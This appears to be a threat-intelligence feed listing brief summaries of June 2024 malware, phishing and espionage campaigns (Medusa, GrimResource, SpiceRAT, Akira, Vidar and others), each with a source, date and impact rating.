Source: https://any.run/cybersecurity-blog/phishing-incident-report/

Intel Source:: Cleafy

Intel Name:: Medusa_reborn

Date of Scan:: 2024-06-25

Impact:: LOW

Summary:: The Cleafy Threat Intelligence team discovered a new fraud campaign involving the Medusa banking trojan. Medusa is an advanced malware family with RAT capabilities discovered a couple of years ago. Its features include a keylogger, screen controls, and the ability to read/write SMS. Those capabilities enable Threat Actors to perform one of the riskiest fraud scenarios: On-Device Fraud (ODF).

Source: https://www.cleafy.com/cleafy-labs/medusa-reborn-a-new-compact-variant-discovered

Intel Source:: Elastic Security Labs

Intel Name:: GrimResource_Infection_Technique

Date of Scan:: 2024-06-25

Impact:: LOW

Summary:: Elastic researchers have discovered a novel command execution mechanism called GrimResource that using specially crafted MSC (Microsoft Saved Console). It allows attackers to execute entire code in the context of mmc.exe if a user clicks on a specially crafted MSC file, with minimum security warnings, making it perfect for obtaining initial access and evading defenses.

Source: https://www.elastic.co/security-labs/grimresource

Intel Source:: Recorded Future

Intel Name:: CopyCop_Expanding_to_Cover_US_Elections

Date of Scan:: 2024-06-25

Impact:: MEDIUM

Summary:: Researchers at RecordedFuture have discovered that CopyCop, a network using AI-generated and human-crafted content, has changed its focus to cover the 2024 US elections while decreasing attention from Russia's conflict with Ukraine and domestic politics in France and the UK. It has developed new websites aimed at individual political leaders and relies on a variety of sources, including conservative US media and Russian-aligned outlets, to spread its content.

Source: https://go.recordedfuture.com/hubfs/reports/cta-ru-2024-0624.pdf

Intel Source:: Group-IB

Intel Name:: Boolka_Unveiled

Date of Scan:: 2024-06-25

Impact:: MEDIUM

Summary:: Group IB researchers have identified a threat actor named Boolka spreading the BMANAGER Trojan through websites. Boolka employs the BeEF framework to extract user data from compromised websites and transmit it to their servers. Boolka regularly updates its attack methods and operates through multiple domains to avoid detection. The BMANAGER Trojan is modular, allowing it to perform various malicious tasks such as logging keystrokes and stealing files. Each component of the virus enhances Boolka's ability to gather critical information from infected systems. Boolka demonstrates advanced expertise by using techniques like PyInstaller and Python, showcasing their proficiency in developing sophisticated malware.

Source: https://www.group-ib.com/blog/boolka/

Intel Source:: PT CSIRT

Intel Name:: The_GoRed_Backdoor_by_ExCobalt

Date of Scan:: 2024-06-24

Impact:: MEDIUM

Summary:: Researchers from the PT ESC CSIRT team have discovered a new Go-written backdoor linked to ExCobalt, a cybercrime group evolved from Cobalt known for financial theft. Active since 2016, ExCobalt focuses on cyberespionage, using tools like CobInt since 2022. They target Russian companies, constantly upgrading tools such as GoRed for stealthy data collection, and adapt standard utilities to bypass security, showing expertise in exploiting vulnerabilities.

Source: https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/excobalt-gored-the-hidden-tunnel-technique/

Intel Source:: Fortinet

Intel Name:: A_Word_doc_deploys_the_RAT

Date of Scan:: 2024-06-24

Impact:: LOW

Summary:: This month Fortinet lab's telemetry data observed a Word doc (FAKTURA.docx) that deploys the Remcos Remote Access Trojan. The analysts discovered new Indicators of Compromise and more information about where this malware was being sent from. Remcos (Remote Control & Surveillance) RAT malware provides attackers with complete control over an infected system. It can be used for data theft, espionage, and other malicious activities.

Source: https://www.forcepoint.com/blog/x-labs/url-shortener-microsoft-word-remcos-rat-trojan

Intel Source:: Rewterz

Intel Name:: Mirai_Botnet_aka_Katana_active_IOCs

Date of Scan:: 2024-06-24

Impact:: MEDIUM

Summary:: The Mirai is a malware that infects Internet of Things (IoT) devices, such as routers, security cameras, and other smart devices, to distribute denial-of-service (DDoS) Mirai is very effective because it can exploit the large number of poorly secured IoT devices that are connected to the internet. It makes it so difficult to defend against, as many of these devices have limited processing power and memory, and may not receive regular security updates.

Source: https://www.rewterz.com/threat-advisory/mirai-botnet-aka-katana-active-iocs-5

Intel Source:: Esentire

Intel Name:: Fake_IT_Support_Site_Spreads_Vidar_Malware

Date of Scan:: 2024-06-24

Impact:: LOW

Summary:: ESentire's researchers discovered a Vidar Stealer malware infection that begins when a user searches for solutions to a Windows Update Error code. The user visits a fake IT support site called PCHelper Wizards, which provides instructions to run a PowerShell script. This script downloads and executes the Vidar Stealer malware using a new variant of Hijack Loader. The process involves downloading files from specific URLs and reporting back to a C2 server. Additionally, a YouTube video linked to this fake support site features automated comments that falsely claim the fix works, attracting more users to run the harmful script. This shows how attackers exploit common IT issues to spread malware by tricking users into visiting fake support sites and running malicious scripts.

Source: https://www.esentire.com/blog/fake-it-support-website-leading-to-vidar-infection

Intel Source:: Rewterz

Intel Name:: RedLine_Stealer_active_IOCs

Date of Scan:: 2024-06-24

Impact:: MEDIUM

Summary:: Redline Stealer is a malware that steals sensitive information from infected systems. The malware is distributed through phishing emails, fake software downloads, or other forms of social engineering. Once it is on a victim's computer, Redline Stealer can collect a wide range of information, including login credentials, credit card numbers, and other sensitive data.

Source: https://www.rewterz.com/threat-advisory/redline-stealer-active-iocs-7

Intel Source:: Cyble

Intel Name:: Embargo_ransomware_developed_in_Rust

Date of Scan:: 2024-06-24

Impact:: LOW

Summary:: Cyble researchers discovered a sample of Embargo ransomware. It was developed in Rust programming language. Threat actors were using double extortion to target their victims. In double extortion, the threat actors steal sensitive information from the victim’s systems before encrypting the data.

Source: https://cyble.com/blog/the-rust-revolution-new-embargo-ransomware-steps-in/

Intel Source:: Cisco Talos

Intel Name:: Unveiling_SpiceRAT

Date of Scan:: 2024-06-24

Impact:: LOW

Summary:: Researchers from Cisco Talos have discovered a new remote access trojan (RAT) named SpiceRAT, used by the threat actor SneakyChef in a campaign targeting government agencies in EMEA and Asia. The attack involved a phishing campaign using the same email address to send both SugarGh0st and SpiceRAT. Two infection chains were identified, using LNK and HTA files as initial attack vectors to deliver SpiceRAT.

Source: https://blog.talosintelligence.com/new-spicerat-sneakychef/

Intel Source:: Rewterz

Intel Name:: An_Emerging_Ducktail_Infostealer

Date of Scan:: 2024-06-24

Impact:: LOW

Summary:: Ducktail Malware is a malicious program designed by hackers to infiltrate computers and networks worldwide. It is usually delivered through spear-phishing emails containing malicious attachments or links. Once installed, it establishes a presence on the system and starts collecting information. The malware spreads via Facebook URLs that redirect users to suspicious sites, tricking them into downloading malicious files. These files pose significant security risks, such as unauthorized access to sensitive data and system compromise. Ducktail, attributed to a Vietnamese group, has been active since 2021 and it keeps changing its tactics, which means it remains a constant threat to user and system security, especially for Facebook Business accounts.

Source: https://www.rewterz.com/threat-advisory/an-emerging-ducktail-infostealer-active-iocs-9

Intel Source:: Rewterz

Intel Name:: APT_29_Targeting_French_Diplomatic_Entities

Date of Scan:: 2024-06-24

Impact:: HIGH

Summary:: According to the French information security agency, ANSSI, reported that the Russian-linked hacking group APT29, also known as Nobelium or Cozy Bear, has been targeting French diplomatic entities through phishing campaigns. These attacks use compromised email accounts to send malicious emails to embassies and agencies, aiming to steal strategic intelligence. Recent incidents include phishing campaigns against European embassies in Kyiv and the French Embassy in Romania. These campaigns are part of broader geopolitical tensions, especially related to Russia's actions against Ukraine. Additionally, Russian hackers were linked to a DDoS attack during the Euro 2024 soccer tournament broadcast in Poland. The attacks pose significant security risks to French and European diplomatic interests.

Source: https://www.rewterz.com/threat-advisory/apt29-targets-french-and-european-diplomatic-entities-in-persistent-cyberattacks-active-iocs

Intel Source:: Recorded Future

Intel Name:: RedJuliett_Targeting_Taiwanese_Organizations

Date of Scan:: 2024-06-24

Impact:: LOW

Summary:: Researchers from Insikt Group have discovered cyber-espionage activities conducted by RedJuliett, a group likely supported by the Chinese government. Their targets include government, academic, technology, and diplomatic organizations in Taiwan. RedJuliett gained initial access by exploiting vulnerabilities in network edge devices such as firewalls, VPNs, and load balancers. Operating possibly from Fuzhou, China, their sustained focus on Taiwan indicates their goal to gather intelligence on Taiwan’s economic, diplomatic, and technological sectors in support of Beijing.

Source: https://www.recordedfuture.com/redjuliett-intensifies-taiwanese-cyber-espionage-via-network-perimeter

Intel Source:: Securonix Threat Labs

Intel Name:: Analysis_of_PHANTOM_SPIKE_attack_campaign

Date of Scan:: 2024-06-24

Impact:: MEDIUM

Summary:: Securonix researchers team have discovered a sophisticated cyber threat campaign named PHANTOM#SPIKE targeting Pakistani victims. Attackers use military-themed phishing docs to lure victims into opening a password-protected ZIP archive that contains the RAT binary. After execution, this malware provides an invisible backdoor for attackers to access the infected systems remotely.

Source: https://www.securonix.com/blog/analysis-of-phantomspike-attackers-leveraging-chm-files-to-run-custom-csharp-backdoors-likely-targeting-victims-associated-with-pakistan/

Intel Source:: ASEC

Intel Name:: CoinMiner_Attacks_on_Korean_Web_Servers

Date of Scan:: 2024-06-24

Impact:: LOW

Summary:: Researchers at ASEC have discovered attack scenarios in which CoinMiners are installed as a result of targeting a Korean medical institution. The Windows IIS server that was the target of the attack was assumed to be a system running the Picture Archiving and Communication System (PACS) based on the path name where the web shells were uploaded.

Source: https://asec.ahnlab.com/en/66994/

Intel Source:: Rewterz

Intel Name:: Earth_Preta_aka_Mustang_Panda_APT_group

Date of Scan:: 2024-06-21

Impact:: HIGH

Summary:: Mustang Panda, aka Bronze President and TA416, has been active the last couple of years. This threat actor targeted government agencies, think tanks, NGOs, and even Vatican-affiliated religious institutions in the United States and Europe. Asian countries, such as Taiwan, Hong Kong, Mongolia, Tibet, and Myanmar, were the main focus of the past campaigns. The group is notorious for creating phishing lures based on current events that might interest its target, for example, the COVID-19 pandemic, political subjects, and most trending issues like Russian-Ukrainian cyber warfare.

Source: https://www.rewterz.com/threat-advisory/earth-preta-aka-mustang-panda-apt-group-active-iocs-3

Intel Source:: CyberArmor

Intel Name:: North_Korean_Hackers_Target_Aerospace_and_Defense

Date of Scan:: 2024-06-21

Impact:: MEDIUM

Summary:: In recent months, North Korean threat actors have escalated their cyber campaigns, targeting Aerospace and Defense sectors with a newly discovered backdoor malware dubbed Niki.

Source: https://cyberarmor.tech/wp-content/uploads/2024/06/New-North-Korean-based-backdoor-packs-a-punch.pdf

Intel Source:: Emanueledelucia

Intel Name:: PowerShell_and_XWorm_journey

Date of Scan:: 2024-06-21

Impact:: LOW

Summary:: Emanuele Delucia researcher came across new malware variants and found something that attracted attention. A few days ago he acquired a VBS file, directed via a malspam campaign against an Italian organization, that was approximately 409 MB in size (sha256:ADF773B49D8306E08B5232039E0DEA143E2C015CDC731F1BE86D7DD92FCCA6A9).

Source: https://www.emanueledelucia.net/a-reverse-engineers-journey-with-powershell-and-xworm/

Intel Source:: Rewterz

Intel Name:: ModiLoader_aka_DBatLoader_or_NatsoLoader_IOCs

Date of Scan:: 2024-06-21

Impact:: MEDIUM

Summary:: ModiLoader or other name is DBatLoader or NatsoLoader was first seen a couple of years ago. This 2-stage loader has been spreading the Remcos, Formbook, and Netwire trojans. This malware is typically infected through malicious attachments, or by being tied to legitimate software. It can do multiple actions like downloading and installing additional malware, such as ransomware or banking Trojans, creating a backdoor into the infected device, allowing hackers to gain access and control of the device, collecting and exfiltrating sensitive information from the infected device, and many other malicious damages.

Source: https://www.rewterz.com/threat-advisory/modiloader-aka-dbatloader-active-iocs

Intel Source:: Rewterz

Intel Name:: SideWinder_APT_group_aka_Rattlesnake_active_IOCs

Date of Scan:: 2024-06-21

Impact:: MEDIUM

Summary:: The SideWinder APT group is a sophisticated cyber espionage group that has been active for more than 10 years. The group is suspected to be based in India and has attacked targeted government agencies, military organizations, and financial institutions in South Asia and the Middle East. The SideWinder APT group is known for using sophisticated tactics and techniques to carry out its attacks.

Source: https://www.rewterz.com/threat-advisory/sidewinder-apt-group-aka-rattlesnake-active-iocs-5

Intel Source:: Cisco Talos

Intel Name:: SneakyChef_group_targets_government_entities

Date of Scan:: 2024-06-21

Impact:: MEDIUM

Summary:: Researchers at Cisco Talos have discovered a ongoing campaign orchestrated by a group named SneakyChef, utilizing the SugarGh0st malware since 2023. This campaign aims to expand its targets beyond South Korea and Uzbekistan to various countries across Europe, the Middle East, and Asia. SneakyChef entices victims with forged scanned documents resembling those from government offices, particularly Ministries of Foreign Affairs and embassies. They employ sophisticated tactics, including new methods such as SFX RAR files to propagate SugarGh0st. SneakyChef likely speaks Chinese based on their language preferences and use of different Gh0st RAT versions. This malware is capable of stealing sensitive information and exhibits persistence, complicating its removal once installed.

Source: https://blog.talosintelligence.com/sneakychef-sugarghost-rat/

Intel Source:: ASEC

Intel Name:: DBatLoader_distributed_as_a_CMD_file

Date of Scan:: 2024-06-21

Impact:: LOW

Summary:: ASEC researchers have discovered the new malware called DBatLoader is now spread through CMD files in phishing emails instead of RAR files with EXE files. These CMD files are encoded in a way that makes them hard to read unless converted. They don't work on Korean Windows due to different code settings but do run on English Windows. The CMD files contain hidden code that decodes and creates a malicious EXE file when run. This file, written in Delphi, can download more harmful data. To avoid these threats, be cautious with unknown emails and keep all software and antivirus programs updated.

Source: https://asec.ahnlab.com/ko/66901/

Intel Source:: Sucuri

Intel Name:: SocGholish_Malware

Date of Scan:: 2024-06-21

Impact:: LOW

Summary:: Sucuri researcher have uncovered the SocGholish Malware. This is a JavaScript malware framework that has been used by cybercriminals since 2017 to trick people into downloading malicious files by pretending to be urgent browser updates. It creates fake update notifications on websites to trick users. Once users download and run these files, the malware installs more dangerous software like Remote Access Trojans (RATs) and infostealers, causing serious security breaches and ransomware attack. SocGholish also uses compromised domains and WordPress plugins to spread its malware. Common SocGholish campaigns include NDSW/NDSX and khutmhpx, which inject malicious code into websites. In 2024, there has been increased activity from SocGholish groups, indicating that the threat is growing and ongoing.

Source: https://blog.sucuri.net/2024/06/socgholish-malware.html#iocs

Intel Source:: ESentire

Intel Name:: AdsExhaust_delivered_via_fake_Oculus_installer_app

Date of Scan:: 2024-06-21

Impact:: LOW

Summary:: Researchers from ESentire have discovered new adware called AdsExhaust, which is being distributed through a fake Oculus installer application. This adware can take screenshots from infected devices and control browsers by mimicking keystrokes, enabling it to click on ads or redirect the browser to specific websites to make money for the operators. The infection begins when users search for the Oculus application and download a malicious ZIP file from a fake Oculus website. The adware continuously collects data, takes screenshots, and sends this information to a control server. AdsExhaust ensures only one instance runs, interacts with Microsoft Edge to click ads, and hides its activities if it detects user interaction.

Source: https://www.esentire.com/blog/adsexhaust-a-newly-discovered-adware-masquerading-oculus-installer

Intel Source:: ASEC

Intel Name:: InnoSetup_Malware_is_created_with_Each_Download

Date of Scan:: 2024-06-21

Impact:: LOW

Summary:: ASEC researchers discovered new malware called InnoLoader posing as fake cracks and commercial tools. Unlike typical malware, InnoLoader displays an installer screen and activates only when the user initiates malicious actions. It creates unique versions of itself for each download to evade detection and can execute malicious code as directed by its command server. In addition to threats like StealC (which steals information), Socks5Systemz (using infected computers as proxies), and Clicker (mimicking a security plugin to boost web traffic), InnoLoader installs legitimate software such as Opera and 360 Security. To hide its operations, the server sometimes sends real software like WinRAR. InnoLoader connects to multiple URLs for downloading and executing files. Another malware, Lu0Bot helps in communication and maintains persistence by copying itself to the ProgramData directory and creating a startup shortcut.

Source: https://asec.ahnlab.com/ko/66982/

Intel Source:: Symantec

Intel Name:: Chinese_Espionage_Targets_Asian_Telecom_Operators

Date of Scan:: 2024-06-20

Impact:: LOW

Summary:: Researchers from Symantec have discovered a persistent espionage campaign using Chinese-linked tools to breach telecom operators in an Asian country. Active since at least 2021, with potential traces back to 2020, the attackers placed backdoors and attempted credential theft. The primary targets were telecom companies, along with a services firm in the telecom sector and a university in another Asian country.

Source: https://symantec-enterprise-blogs.security.com/threat-intelligence/telecoms-espionage-asia

Intel Source:: Malwaremustdie Blog

Intel Name:: A_malicious_campaign_FHAPPI

Date of Scan:: 2024-06-20

Impact:: LOW

Summary:: This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (RAT) through process injection. The researcher provides a detailed reverse engineering analysis of the malware components, including decoding multiple layers of obfuscation, identifying the use of PowerSploit code, and tracing the malware's behavior and network communications. The report concludes by attributing the campaign to the threat actor APT10 and providing relevant indicators of compromise.

Source: https://blog.malwaremustdie.org/2024/06/mmd-068-2024-english-report-of-fhappi.html

Intel Source:: Walmart Global Tech Blog

Intel Name:: Resurgence_and_Evolution_of_Spectre_RAT_v9

Date of Scan:: 2024-06-20

Impact:: LOW

Summary:: Researchers from Walmart Global have observed that Spectre RAT has re-emerged in recent campaigns, distributing via livechat domain with code signing certificates that remain undetected longer than traditional methods. A two-month gap between signed files revealed a new hosting mechanism on cdn-staging[.]livechat-files[.]com, dating back to January 2024. Spectre RAT uses a crypter with timing checks to evade virtual machine detection, allocating and freeing memory while copying the foreground window name into new memory to appear harmless.

Source: https://medium.com/walmartglobaltech/spectre-spc-v9-campaigns-and-updates-546c2e65e247

Intel Source:: Twitter

Intel Name:: A_new_stealer_named_SatanStealer

Date of Scan:: 2024-06-20

Impact:: LOW

Summary:: An open-source stealer tool "SatanStealer" was shared on GitHub. Some features of SatanStealer were developed with Python. It can steal Discord Token, Discord injection, registered phone numbers, e-mail information, capture browser cookies and passwords - capturing Crypto Wallets (Metamask, Atomic, Exodus, Binance, Coinbase, Trust, Phantom), Telegram can steal Steam and Riot Game information.

Source: https://x.com/MonThreat/status/1802990884255883617?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1802990884255883617%7Ctwgr%5Ee790a40f1f123dfc65c5c04fcde3ea59a2693090%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fcybersecuritynews.com%2Fnew-satanstealer-malware%2F

Intel Source:: Fortinet

Intel Name:: Fickle_Stealer_Spread_via_Multiple_Attack_Chains

Date of Scan:: 2024-06-20

Impact:: MEDIUM

Summary:: FortiGuard researchers have discovered a new malware called Fickle Stealer, written in the Rust programming language. It infects systems through multiple methods, such as VBA dropper, VBA downloader, link downloader, and executable downloader. These methods mainly download a PowerShell script to begin the infection. The VBA dropper uses a Word document to run a hidden script, while the VBA downloaders use different tricks to download the script. The link downloader and executable downloader, the latter pretending to be a PDF viewer, also spread the malware. Once on the system, the PowerShell scripts bypass User Account Control (UAC) and run the malware, which then creates tasks and injects malicious code. The malware targets sensitive files and applications based on commands from its server and sends stolen data, including screenshots, back to the attacker.

Source: https://www.fortinet.com/blog/threat-research/fickle-stealer-distributed-via-multiple-attack-chain

Intel Source:: Rexorvc0

Intel Name:: Akira_gang_new_attacks_with_the_old_style

Date of Scan:: 2024-06-20

Impact:: MEDIUM

Summary:: Rexorvc0 researchers provided a report for Akira threat actors' new attack style. Akira is a threat actor categorized within the criminal groups related to ransomware, whose main objective is to gain money through extortion. Since 2022, this gang has been increasing its list of victims by following methods similar to other criminal groups. Akira is one of the principal TAs in terms of victims in recent years. The TA has utilized different tools such as malware and vulnerability exploitation during their attacks. Depending on the victims, it was observed phases aimed at avoiding detection, lateral movements, and various exfiltration methods that have evolved and adapted to their needs. The malware has also undergone significant changes over time. Akira maintains a close relationship with Conti, the ransomware used by WizardSpider.

Source: https://rexorvc0.com/2024/06/19/Akira-The-Old-New-Style-Crime/

Intel Source:: Trellix

Intel Name:: Info_Stealing_Campaign_Using_DLL_Sideloading

Date of Scan:: 2024-06-19

Impact:: LOW

Summary:: In March 2024, researchers at Trellix have detected a sophisticated cyber attack targeting users in Latin America and Asia Pacific. Adversaries distribute password-protected archive files containing a trojanized Cisco Webex Meetings App (ptService.exe), which executes a stealthy malware loader known as HijackLoader, this loader facilitates the deployment of Vidar Stealer. The attack aims to evade detection by hijacking legitimate processes and exploiting defense evasion tactics.

Source: https://www.trellix.com/blogs/research/how-attackers-repackaged-a-threat-into-something-that-looked-benign/

Intel Source:: LevelBlue Labs

Intel Name:: New_Loader_Targeting_Chinese_Organizations

Date of Scan:: 2024-06-19

Impact:: LOW

Summary:: LevelBlue Labs researchers have found a new highly evasive malware loader called SquidLoader through phishing campaigns targeting specific victims. It effectively evades detection using advanced tactics and making analysis challenging. Also, it delivers a second-stage payload namely a modified Cobalt Strike sample indicating that it serves as an initial infection vector for more complex malware. Primarily targeting Chinese-speaking victims this malware demonstrates potential for replication by other threat actors posing a broader future threat.

Source: https://cybersecurity.att.com/blogs/labs-research/highly-evasive-squidloader-targets-chinese-organizations

Intel Source:: Trend Micro

Intel Name:: Void_Arachne_Targets_Chinese_Users_with_Winos_4

Date of Scan:: 2024-06-19

Impact:: LOW

Summary:: Researchers from Trend Micro have discovered a new threat actor group named Void Arachne. This group targets Chinese-speaking users by distributing malicious Windows Installer (MSI) files. These MSI files, which appear to be legitimate software installers for AI and other popular applications, are bundled with harmful Windows payloads. Additionally, the campaign distributes compromised MSI files that include nudifiers, deepfake pornography-generating software, and AI-based voice and facial technologies.

Source: https://www.trendmicro.com/en_us/research/24/f/behind-the-great-wall-void-arachne-targets-chinese-speaking-user.html

Intel Source:: PaloAlto

Intel Name:: Google_Ad_Infects_Matanbuchus_with_DanaBot

Date of Scan:: 2024-06-19

Impact:: LOW

Summary:: Researchers at PaloAlto have observed Google ads lead to fake funds claim sites, which leads to Matanbuchus infection with Danabot.

Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-06-17-IOCs-from-Matanbuchus-infection-with-Danabot.txt

Intel Source:: Checkpoint

Intel Name:: Online_phishing_scams_related_to_summer_vacations

Date of Scan:: 2024-06-18

Impact:: LOW

Summary:: Check Point researchers discovered and warned about online phishing scams connected to summer vacations. 1 in every 33 new summer vacation-related domains registered in the previous month of May was malicious or suspicious. Checkpoint provides examples of vacation-related scams and tips on how to remain vigilant during the hot season.

Source: https://blog.checkpoint.com/security/protect-yourself-from-summer-vacation-scams-stay-cyber-aware-during-your-vacation/

Intel Source:: Datadog Security Labs

Intel Name:: New_Campaign_Targeting_Docker_API_Flaws

Date of Scan:: 2024-06-18

Impact:: LOW

Summary:: Researchers from Datadog Security Labs have discovered a new campaign targeting unauthenticated, publicly exposed Docker API endpoints to spread cryptojacking malware. They identified two new binary payloads: chkstart, a remote access tool that can download and execute additional payloads, and exeremo, a tool for spreading the malware via SSH. The campaign also involves new attacker infrastructure.

Source: https://securitylabs.datadoghq.com/articles/attackers-deploying-new-tactics-in-campaign-targeting-exposed-docker-apis/

Intel Source:: Rapid7

Intel Name:: Malvertising_Campaign_Executes_Oyster_Backdoor

Date of Scan:: 2024-06-18

Impact:: MEDIUM

Summary:: Rapid7 researchers have uncovered a malvertising campaign tricking users into downloading fake installers for popular software like Google Chrome and Microsoft Teams. These installers install a backdoor called Oyster or Broomstick. Once installed, the backdoor runs commands and adds more malicious software. This occurs when users find these fake websites through search engines like Google and Bing when looking for Microsoft Teams. The fake websites look like real Microsoft Teams sites, making users think they are downloading legitimate software, but they are downloading malware.

Source: https://www.rapid7.com/blog/post/2024/06/17/malvertising-campaign-leads-to-execution-of-oyster-backdoor/

Intel Source:: Mandiant, Google Cloud Blog

Intel Name:: UNC3886_Espionage_Operations

Date of Scan:: 2024-06-18

Impact:: MEDIUM

Summary:: Last year, Mandiant started to investigate multiple intrusions performed by UNC3886, a suspected China-nexus cyberespionage actor that has targeted prominent strategic organizations on a global scale. This blog post shared UNC3886's intrusion path and subsequent actions that were performed in the environments after compromising the guest virtual machines to achieve access to the critical systems like The use of publicly available rootkits for long-term persistence, Deployment of malware that leveraged trusted third-party services for command and control (C2 or C&C), subverting access and collecting credentials with Secure Shell (SSH) backdoors, extracting credentials from TACACS+ authentication using custom malware.

Source: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations/

Intel Source:: Proofpoint

Intel Name:: Paris_2024_Summer_Olympic_Games_fraud_website

Date of Scan:: 2024-06-18

Impact:: LOW

Summary:: This month, Proofpoint discovered a fake website that is selling tickets to the Paris 2024 Summer Olympic Games. The website “paris24tickets[.]com” claimed to be a “secondary marketplace for sports and live events tickets.” It was listed as the second sponsored search result on Google, after the official website, when searching for “Paris 2024 tickets,” and related searches.

Source: https://www.proofpoint.com/us/blog/threat-insight/security-brief-scammers-create-fraudulent-olympics-ticketing-websites

Intel Source:: ISC.SANS

Intel Name:: New_NetSupport_campaign_delivered

Date of Scan:: 2024-06-18

Impact:: LOW

Summary:: It is known that the attackers reuse and combine known techniques to target their victims with new campaigns. Last week, ISC.SANS researcher Xavier Mertens spotted some malicious MSIX packages on VT that drop a NetSupport client preconfigured to phone home to an attacker's controlled manager. Remote support tools are really useful for attackers because they provide a perfect way to communicate with infected computers without the need to develop their own C2 infrastructure and protocol.

Source: https://isc.sans.edu/diary/New+NetSupport+Campaign+Delivered+Through+MSIX+Packages/31018/

Intel Source:: Splunk

Intel Name:: Analysis_of_recent_LNK_phishing

Date of Scan:: 2024-06-18

Impact:: LOW

Summary:: Splunk analysts provided a deep analysis of recent LNK phishing campaigns, examining the tactics, techniques, and procedures (TTPs) employed by threat actors. Splunk also presented tools and techniques for simulating these phishing campaigns, helping defenders test their defenses against malicious LNK usage.

Source: https://www.splunk.com/en_us/blog/security/lnk-phishing-analysis-simulation.html

Intel Source:: ASEC

Intel Name:: Coin_miner_attacks_targeting_domestic_web_servers

Date of Scan:: 2024-06-18

Impact:: LOW

Summary:: ASEC researchers have uncovered an attack on the Windows IIS server of a domestic medical institution using PACS (Picture Archiving and Communication System) software. PACS is a software which helps hospitals manage and share medical images. The attacks happen twice by Chinese-speaking attackers. The attackers upload web shells to exploit PACS vulnerabilities or security misconfigurations. In the first attack, they use web shells like Chopper and Behinder to gather system information, escalate privileges with BadPotato, and install Cpolar for remote access. In the second attack, they use different tools for privilege escalation, such as GodPotato and EarthWorm. Both attacks aim to install the XMRig coin miner.

Source: https://asec.ahnlab.com/ko/66860/

Intel Source:: Recorded Future

Intel Name:: The_Journey_of_Markopolo

Date of Scan:: 2024-06-18

Impact:: LOW

Summary:: Researchers at RecordedFuture have identified a fake virtual meeting software named Vortax that after download and installation started delivering three infostealers in the form of Rhadamanthys, Stealc, and, most famously, Atomic macOS Stealer (AMOS) as part of a larger campaign to steal cryptocurrency. This campaign is operated by a threat group known as markopolo and its extensive ramifications probably indicate that similar tactics will be used in the future to propagate AMOS attacks, which will eventually lead to a long-term rise in the number of AMOS victims.

Source: https://go.recordedfuture.com/hubfs/reports/cta-2024-0617.pdf

Intel Source:: Cyble

Intel Name:: Rising_wave_of_QR_code_phishing_attacks

Date of Scan:: 2024-06-18

Impact:: LOW

Summary:: https://cyble.com/blog/rising-wave-of-qr-code-phishing-attacks-chinese-citizens-targeted-using-fake-official-documents/

Source: https://cyble.com/blog/rising-wave-of-qr-code-phishing-attacks-chinese-citizens-targeted-using-fake-official-documents/

Intel Source:: EclecticIQ

Intel Name:: ONNX_Store_PhaaS_Targeting_Financial_Institutions

Date of Scan:: 2024-06-18

Impact:: MEDIUM

Summary:: EclecticIQ researchers have identified a phishing campaign targeting financial institutions. Attackers are using PDF documents with embedded QR codes to lead victims to phishing websites. The campaign is being run by ONNX Store, a Phishing-as-a-Service (PhaaS) platform. It comes with a two-factor authentication (2FA) bypass system that observes on victims 2FA requests.

Source: https://blog.eclecticiq.com/onnx-store-targeting-financial-institution

Intel Source:: Avast

Intel Name:: New_Diamorphine_rootkit_variant_in_the_wild

Date of Scan:: 2024-06-18

Impact:: LOW

Summary:: Last March 2024, Avast researchers discovered a new Diamorphine variant undetected in the wild. After getting some sample, which was examined in the .modinfo section, it was observed that it fakes the legitimate x_tables Netfilter module and was compiled for a specific kernel version. Diamorphine is a well-known Linux kernel rootkit that supports different Linux kernel versions (2.6.x, 3.x, 4.x, 5.x and 6.x) and processor architectures (x86, x86_64, and ARM64). When loaded, the module becomes invisible and hides all the files and folders starting with the magic prefix chosen by the attacker.

Source: https://decoded.avast.io/davidalvarez/new-diamorphine-rootkit-variant-seen-undetected-in-the-wild/

Intel Source:: Bitsight

Intel Name:: Latrodectus_loader_came_back

Date of Scan:: 2024-06-18

Impact:: MEDIUM

Summary:: Last month, the operation Operation Endgame, targeted several big botnets but missed Latrodectus. These botnets compromised operations and shut down their infrastructure. Latrodectus was also affected and its infrastructure went offline. The infrastructure of Latrodectus and IcedID overlapped with each other. Latrodectus is a loader capable of downloading and executing additional payloads and modules to extend its own functionally. This malware is usually distributed through email spam campaigns, primarily by two threat actors known as TA577 and TA578.

Source: https://www.bitsight.com/blog/latrodectus-are-you-coming-back

Intel Source:: ISC.SANS

Intel Name:: NetSupport_Campaign_Delivering_via_MSIX_Packages

Date of Scan:: 2024-06-17

Impact:: LOW

Summary:: ISC.SANS researchers have discovered several malicious MSIX packages on VT that drop a NetSupport client that is ready to call home to a manager under the control of the attacker. Attackers benefit from remote support tools because they offer an ideal means of communication with compromised systems without requiring the development of their own C2 infrastructure and protocol. While certain programs, like AnyDesk or TeamViewer, are well-known and frequently looked up as signs of compromise, other programs, like NetSupport, are more likely to go unnoticed. This one has all the anticipated capabilities to communicate with victims and is free for 30 days.

Source: https://isc.sans.edu/diary/rss/31018

Intel Source:: ASEC

Intel Name:: Korean_Corporations_ERP_Server_and_Installs_VPN_Server

Date of Scan:: 2024-06-17

Impact:: MEDIUM

Summary:: The AhnLab Security Intelligence Center has discovered a cyberattack on a Korean corporation's ERP server, where the attacker exploited a vulnerable MS-SQL service. Initially, the threat actor scanned the network, gathered system information, and tested payload downloads. They then installed a web shell for persistent access and control, ultimately deploying SoftEther VPN to use the compromised system as a VPN server. The configuration indicated a "cascade connection," suggesting the VPN server was linked to another VPN server, likely to establish a more secure and private command and control (C&C) infrastructure.

Source: https://asec.ahnlab.com/en/66843/

Intel Source:: Trend Micro

Intel Name:: Noodle_RAT_Backdoor_Used_by_Chinese_Speaking_Groups

Date of Scan:: 2024-06-17

Impact:: MEDIUM

